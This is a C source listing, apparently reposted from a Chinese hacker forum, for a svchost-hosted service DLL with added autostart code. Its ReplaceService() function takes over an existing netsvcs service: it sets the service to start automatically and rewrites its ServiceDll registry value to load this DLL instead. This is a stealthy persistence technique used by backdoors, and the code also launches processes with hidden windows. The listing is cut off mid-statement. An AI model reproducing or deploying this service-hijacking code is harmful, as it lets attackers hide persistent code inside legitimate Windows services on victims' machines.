信息来源:邪恶八进制 文章作者:dream2fly.net
//说明:大部门代码来自bingle的文章,感谢bingle,并加入装载自启动代码
//感谢使用,幻影光临白帽子实验室http://www.dream2fly.net/forum
Code Language : C
1.
2.
//Service HANDLE & STATUS used to get service state
3.
SERVICE_STATUS_HANDLE hSrv;
4.
DWORD dwCurrState;
5.
6.
//report service stat to the service control manager
7.
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
8.
9.
//RealService just create a process dream2fly.net
10.
int ControlService(DWORD dwCommand)
11.
{
12.
char cmd[MAX_PATH] = {0};
13.
if (dwCommand == SERVICE_CONTROL_CONTINUE)
14.
{
15.
strcpy(cmd, "net start ");
16.
}
17.
else if(dwCommand == SERVICE_CONTROL_STOP)
18.
{
19.
strcpy(cmd, "net stop ");
20.
}
21.
strcat(cmd, stServiceCfg.szSvcName);
22.
23.
PROCESS_INFORMATION pi;
24.
STARTUPINFO si;
25.
memset(&si,0,sizeof(si));
26.
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
27.
si.wShowWindow=SW_HIDE;
28.
if(!CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
29.
OutputString("SvcHostDLL: CreateProcess(%s) error:%d", cmd, GetLastError());
30.
else OutputString("SvcHostDLL: CreateProcess(%s) to %d", cmd, pi.dwProcessId);
31.
32.
return 0;
33.
}
34.
35.
int ReplaceService()
36.
{
37.
int rc = 0;
38.
HKEY hKey = 0;
39.
40.
try{
41.
char buff[500];
42.
43.
//query svchost setting
44.
char *ptr, *pSvchost = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost";
45.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
46.
if(ERROR_SUCCESS != rc)
47.
{
48.
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
49.
throw "";
50.
}
51.
52.
DWORD type, size = sizeof buff;
53.
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
54.
RegCloseKey(hKey);
55.
SetLastError(rc);
56.
if(ERROR_SUCCESS != rc)
57.
throw "RegQueryValueEx(Svchost\netsvcs)";
58.
59.
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
60.
if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;
61.
62.
if(*ptr == 0)
63.
{
64.
OutputString("you specify service name not in Svchost\netsvcs, must be one of following:");
65.
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
66.
OutputString(" - %s", ptr);
67.
throw "";
68.
}
69.
70.
//config service
71.
strncpy(buff, "SYSTEM\CurrentControlSet\Services\", sizeof buff);
72.
strcat(buff, stServiceCfg.szSvcName);
73.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
74.
if(ERROR_SUCCESS != rc)
75.
{
76.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
77.
throw "";
78.
}
79.
80.
DWORD dwValue = 2;//auto start
81.
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
82.
SetLastError(rc);
83.
if(ERROR_SUCCESS != rc)
84.
throw "RegSetValueEx(start)";
85.
86.
////////////////////
87.
char szDllPath[MAX_PATH] = {0};
88.
if(!GetModuleFileName(HMODULE(hDll), szDllPath, sizeof szDllPath))
89.
throw "GetModuleFileName() get dll path";
90.
91.
LogToFile(szDllPath, GetLastError());
92.
93.
strcat(buff, "\Parameters");
94.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
95.
if(ERROR_SUCCESS != rc)
96.
{
97.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
98.
throw "";
99.
}
100.
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
101.
SetLastError(rc);
102.
if(ERROR_SUCCESS != rc)
103.
th